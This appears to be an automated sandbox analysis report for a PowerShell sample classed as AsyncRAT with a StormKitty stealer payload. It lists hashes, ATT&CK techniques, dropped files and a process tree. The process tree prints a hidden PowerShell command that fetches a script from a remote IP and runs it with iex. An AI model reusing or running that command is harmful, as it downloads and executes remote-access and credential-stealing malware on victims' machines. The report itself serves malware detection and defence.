asyncrat | 61270d6564a80eff42a00bf542fc79224949fb27df8c1d6d3acbaa6000fc8577

Analysis

max time kernel
94s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-01-2025 03:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

61270d6564a80eff42a00bf542fc79224949fb27df8c1d6d3acbaa6000fc8577.ps1
Size

2KB
MD5

898d5189a1dc57fa7a80b4d986ef77c9
SHA1

aeb3667119b2fda564f498d26c04758caf44b1c5
SHA256

61270d6564a80eff42a00bf542fc79224949fb27df8c1d6d3acbaa6000fc8577
SHA512

d8cc4add28939f7072fad657b863f0e49ae420bae27a952db499f66caebbda79ff29a552f12ef0cd2cbd1d32003c0db940f0a16bceca196cd3684472c0c2e8c8

Score

10^/10

asyncrat stormkitty discovery execution rat stealer

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/456-58-0x0000000000400000-0x0000000000704000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	2524	powershell.exe
17	4700	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2524	powershell.exe
4700	powershell.exe

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2160	Package.exe

Loads dropped DLL 1 IoCs

pid	Process
2160	Package.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4700 set thread context of 456	4700	powershell.exe	90

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1580	2160	WerFault.exe	84

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Package.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2524	powershell.exe
2524	powershell.exe
2524	powershell.exe
2524	powershell.exe
4700	powershell.exe
4700	powershell.exe
456	RegAsm.exe
456	RegAsm.exe
456	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeDebugPrivilege	456	RegAsm.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2160	Package.exe
2160	Package.exe
2160	Package.exe
456	RegAsm.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 2524 wrote to memory of 2716	2524	powershell.exe	83
PID 2524 wrote to memory of 2716	2524	powershell.exe	83
PID 2716 wrote to memory of 2160	2716	cmd.exe	84
PID 2716 wrote to memory of 2160	2716	cmd.exe	84
PID 2716 wrote to memory of 2160	2716	cmd.exe	84
PID 2160 wrote to memory of 4304	2160	Package.exe	85
PID 2160 wrote to memory of 4304	2160	Package.exe	85
PID 2160 wrote to memory of 4304	2160	Package.exe	85
PID 4304 wrote to memory of 4700	4304	cmd.exe	87
PID 4304 wrote to memory of 4700	4304	cmd.exe	87
PID 4304 wrote to memory of 4700	4304	cmd.exe	87
PID 4700 wrote to memory of 3400	4700	powershell.exe	88
PID 4700 wrote to memory of 3400	4700	powershell.exe	88
PID 4700 wrote to memory of 3400	4700	powershell.exe	88
PID 3400 wrote to memory of 1192	3400	csc.exe	89
PID 3400 wrote to memory of 1192	3400	csc.exe	89
PID 3400 wrote to memory of 1192	3400	csc.exe	89
PID 4700 wrote to memory of 456	4700	powershell.exe	90
PID 4700 wrote to memory of 456	4700	powershell.exe	90
PID 4700 wrote to memory of 456	4700	powershell.exe	90
PID 4700 wrote to memory of 456	4700	powershell.exe	90
PID 4700 wrote to memory of 456	4700	powershell.exe	90
PID 4700 wrote to memory of 456	4700	powershell.exe	90
PID 4700 wrote to memory of 456	4700	powershell.exe	90
PID 4700 wrote to memory of 456	4700	powershell.exe	90

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\61270d6564a80eff42a00bf542fc79224949fb27df8c1d6d3acbaa6000fc8577.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\Temp\Package.exe
    C:\Windows\Temp\Package.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2160
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4304
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4700
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bwfn0zhk\bwfn0zhk.cmdline"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3400
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86B4.tmp" "c:\Users\Admin\AppData\Local\Temp\bwfn0zhk\CSCC652072781E14108B8969FF911DBA595.TMP"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1192
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:456
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 376
      4⤵
      Program crash
      PID:1580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2160 -ip 2160
1⤵
PID:4792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8d80c45e0e047b75073a3d1c2710c68f

SHA1
babc73cf30327b36d184239a2747ec94d48929f4

SHA256
6859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64

SHA512
5da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES86B4.tmp

Filesize
1KB

MD5
32a122de2f2586043d3af232a620d3c3

SHA1
ad4cd75d51abc4bd7ae06b72a33338e61b96b7f4

SHA256
091785a6067ab07aab969a2c5624b2401e2f33e649c12c78e42369431b70b87c

SHA512
b943010753aea54855aeb8d4a9b52541a1e5d3065e99c3d3e982df862450ecbfc24cd12b7a720652af78e1bcce34fd46217ee7dd39c59a21699bef4a1472150e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1g2dregu.bmw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bwfn0zhk\bwfn0zhk.dll

Filesize
9KB

MD5
588f4044edcd1f21ed1f630316f5adf7

SHA1
42884059cd6ba2f2ce390f85bf861f5bd4c311dd

SHA256
1ff2eb460a97ea9409afaf1979cc1f218bf71e5ef183680792fb997d91227901

SHA512
cdf0367808b28b5ebed83dbe305aa93aef54c8dd484d2f57e7f79f0f423d69b18b362b46900d8910a494dc3a573c719a234377ca21b258507dcf183c04cb9720

Download Submit
C:\Windows\Temp\IVIEWERS.DLL

Filesize
88KB

MD5
33ae2b9c3e710254fe2e2ce35ff8a7c8

SHA1
109e32187254b27e04ef18bbe1b48fad42bca841

SHA256
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68

SHA512
2abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599

Download Submit
C:\Windows\Temp\Package.exe

Filesize
201KB

MD5
2696d944ffbef69510b0c826446fd748

SHA1
e4106861076981799719876019fe5224eac2655c

SHA256
a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a

SHA512
c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bwfn0zhk\CSCC652072781E14108B8969FF911DBA595.TMP

Filesize
652B

MD5
814af6902b7511d239645f1cbcf9e884

SHA1
0e4b2217fcbf967a5013ff3f361a9d15dc503aab

SHA256
3223f43ca5cd51e70e0f6c75fb91cda902c1b44b3e57eeb96b425d6b5e392a5d

SHA512
8da7d987b0e62105716abc4143a605c28fd8c2d6cf3e8fd08aa38565a7f17b59b1eae61529d7bee551b31b459dc65c4e41818e4f00fee3cf27a807d05bb95db2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bwfn0zhk\bwfn0zhk.0.cs

Filesize
10KB

MD5
3fa79decff8805745cea8116d9bb2643

SHA1
92343c5fa2c768b964ae3a4e9136e5d7193e8558

SHA256
e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c

SHA512
5c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bwfn0zhk\bwfn0zhk.cmdline

Filesize
204B

MD5
940838f21808ad44381a0fd8a014b8fb

SHA1
bbcf27c04959554c345ce30cd7d9b43709443bc1

SHA256
be135a89d528a526e4a1d5229f9863678d316489163b9844e3d9a6de8283a9f4

SHA512
2f6230e17bd3c2730dd753c651c3b8b20398ebd2119eecf303df05c423989d59ea0ca90cffa04cbb56559573784bac8930ab3f1f5a7d17daef05c0573e4b4d12

Download Submit
memory/456-66-0x00000000064B0000-0x000000000654C000-memory.dmp

Filesize
624KB

Download
memory/456-67-0x0000000006940000-0x0000000006C94000-memory.dmp

Filesize
3.3MB

Download
memory/456-63-0x0000000005580000-0x000000000558A000-memory.dmp

Filesize
40KB

Download
memory/456-62-0x00000000055A0000-0x0000000005632000-memory.dmp

Filesize
584KB

Download
memory/456-61-0x00000000056C0000-0x0000000005C64000-memory.dmp

Filesize
5.6MB

Download
memory/456-58-0x0000000000400000-0x0000000000704000-memory.dmp

Filesize
3.0MB

Download
memory/2524-0-0x00007FFBFB083000-0x00007FFBFB085000-memory.dmp

Filesize
8KB

Download
memory/2524-20-0x00007FFBFB080000-0x00007FFBFBB41000-memory.dmp

Filesize
10.8MB

Download
memory/2524-12-0x00007FFBFB080000-0x00007FFBFBB41000-memory.dmp

Filesize
10.8MB

Download
memory/2524-11-0x00007FFBFB080000-0x00007FFBFBB41000-memory.dmp

Filesize
10.8MB

Download
memory/2524-10-0x0000017BAFD50000-0x0000017BAFD72000-memory.dmp

Filesize
136KB

Download
memory/4700-23-0x0000000002280000-0x00000000022B6000-memory.dmp

Filesize
216KB

Download
memory/4700-43-0x00000000071D0000-0x00000000071DE000-memory.dmp

Filesize
56KB

Download
memory/4700-42-0x00000000060E0000-0x00000000060FA000-memory.dmp

Filesize
104KB

Download
memory/4700-41-0x00000000073A0000-0x0000000007A1A000-memory.dmp

Filesize
6.5MB

Download
memory/4700-40-0x0000000005BE0000-0x0000000005C2C000-memory.dmp

Filesize
304KB

Download
memory/4700-56-0x00000000071E0000-0x00000000071E8000-memory.dmp

Filesize
32KB

Download
memory/4700-39-0x0000000005BC0000-0x0000000005BDE000-memory.dmp

Filesize
120KB

Download
memory/4700-37-0x0000000005580000-0x00000000058D4000-memory.dmp

Filesize
3.3MB

Download
memory/4700-27-0x0000000004E00000-0x0000000004E66000-memory.dmp

Filesize
408KB

Download
memory/4700-26-0x0000000004D90000-0x0000000004DF6000-memory.dmp

Filesize
408KB

Download
memory/4700-25-0x0000000004CF0000-0x0000000004D12000-memory.dmp

Filesize
136KB

Download
memory/4700-24-0x0000000004ED0000-0x00000000054F8000-memory.dmp

Filesize
6.2MB

Download